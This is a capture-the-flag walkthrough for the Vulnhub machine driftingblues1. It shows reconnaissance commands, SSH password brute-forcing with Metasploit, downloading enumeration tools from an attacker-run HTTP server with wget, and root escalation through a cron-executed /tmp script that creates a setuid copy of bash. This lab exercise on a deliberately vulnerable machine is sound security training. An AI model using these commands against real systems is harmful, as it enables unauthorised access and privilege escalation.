We are going to exploit the driftingblues1 machine of Vulnhub. Our goal is to capture user and root flags. Also, make sure to check out the walkthroughs on the harry potter series.
Foothold
fping
fping -aqg 10.0.2.0/24
nmap
ports=$(nmap -p- --min-rate=1000 -T4 10.0.2.9 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV 10.0.2.9
gobuster dir
gobuster dir -u http://10.0.2.9 -x html,txt,php,bak --wordlist=/usr/share/wordlists/dirb/common.txt
We have secret.html and index.html files. So, we can open them in browsers or use curl for the sake of saving time.
curl
curl http://10.0.2.9/index.html
There is an email `sheryl@driftingblues.box. So, we might speculate that there is a user sheryl and the hostname of the server is driftingblues.box. We have to add that to hosts file. Meanwhile, let’s find some other information from the page.
echo L25vdGVmb3JraW5nZmlzaC50eHQ= | base64 -d 
Information gathered from the page:
- The hostname is driftingblues.box
- There are two users eric and sheryl.
- There is another path in the URL
/noteforkingfish.txt.
Let’s check the path /secret.html.
curl http://10.0.2.9/secret.html
It just tells us to dig deeper. We will!
Add to hosts file
sudo vi /etc/hosts
Open /noteforkingfish.txt
curl http://driftingblues.box/noteforkingfish.txt
I am afraid now seeing these Ook messages with different punctuations. Maybe it’s some encoded message. We will search the internet for this.
I used another website to decode the message. https://www.geocachingtoolbox.com/index.php
This means, we haven’t yet identified the secret location which seems to be some subdomain of driftingblues.box. We can enumerate virtual hosts using gobuster.
gobuster – vhost
gobuster vhost -u driftingblues.box --wordlist /usr/share/wordlists/dirb/common.txt
We found out a vhost test.driftingblues.box. Hence, we will also be adding this host to our hosts file.
sudo vi /etc/hosts
Now, we will curl to the newly found url.
curl http://test.driftingblues.box
Let’s enumerate on the this host using ZAP or nikto whichever you feel comfortable with.
nikto -h http://test.driftingblues.box/
We saw that /ssh_cred.txt is giving us 200 OK status. Let’s visit that file from firefox.
Now, we know the format of the password. However, there needs to be a digit at the end of it. So, we have to brute-force to get entry. For this, we can simply create a wordlist using a script (bash or python or any) or manually whichever is faster for you.
for i in {0..9}; do echo 1<snip>y${i};done | tee wordlist
Also, during our initial enumeration we found out there are two users – eric and sheryl. Hence, we are going to perform brute-force for these users using metasploit framework.
msfconsole
msfconsoleuse auxiliary/scanner/ssh/ssh_login
set username eric
set pass_file wordlist
set rhosts 10.0.2.9
set verbose true
run
We found out the password of user eric.
Privilege User – eric
Now, we can do ssh with the credentials.
ssh eric@10.0.2.9
Privilege Root
I will be using my two favourite tools, linpeas.sh and pspy to enumerate further. linpeas.sh does a Linux enumeration whereas pspy does unthenticated process snooping. For that to work, you have to create server on the local machine and serve those file.
On attacker (local) machine:
python -m http.server 8080On target machine:
./linpeas.sh | tee output
wget http://10.0.2.15:8080/linpeas.sh
chmod +x linpeas.sh
wget http://10.0.2.15:8080/pspy64
chmod +x pspy64We found out the cron job. Also, there might be another vulnerability in sudo version.
pspy
./pspy64
On running pspy64 we found out that there is a backup script running every minute and also it is invoking another script from /tmp directory.
Now, let’s examine the backup.sh script.
cat /var/backups/backup.sh
The backup.zip file which we saw earlier in the linpeas.sh enumeration is a result of this script. Also, the developer has included a backdoor in the script. Now, it’s easy to get another shell, or reverse shell, or we can add ssh entry, or we can also change the password of the root user. We have infinite possibilities. For this, we just have to update /tmp/emergency file and make it executable.
Add a custom bash
nano /tmp/emergency
chmod +x /tmp/emergency#!/bin/bash cp /bin/bash /tmp/bash && chmod +s /tmp/bash
The above line copies the binary bash and gives the setuid permission to it. Therefore, when root executes this line, we will get a copy of bash with setuid permission of root. Then, we can simply put -p flag and impersonate root.
./pspy64
Now, we can try to impersonate the root user.
/tmp/bash -p
We got the root access.
cat /root/root.txt
We got the root flag.
Conclusion
I learnt about Ook encoding from this machine. Other than that, we got to use gobuster vhost enumeration. Since the machine was labelled as easy, it is easy. I will do driftingblues2 soon.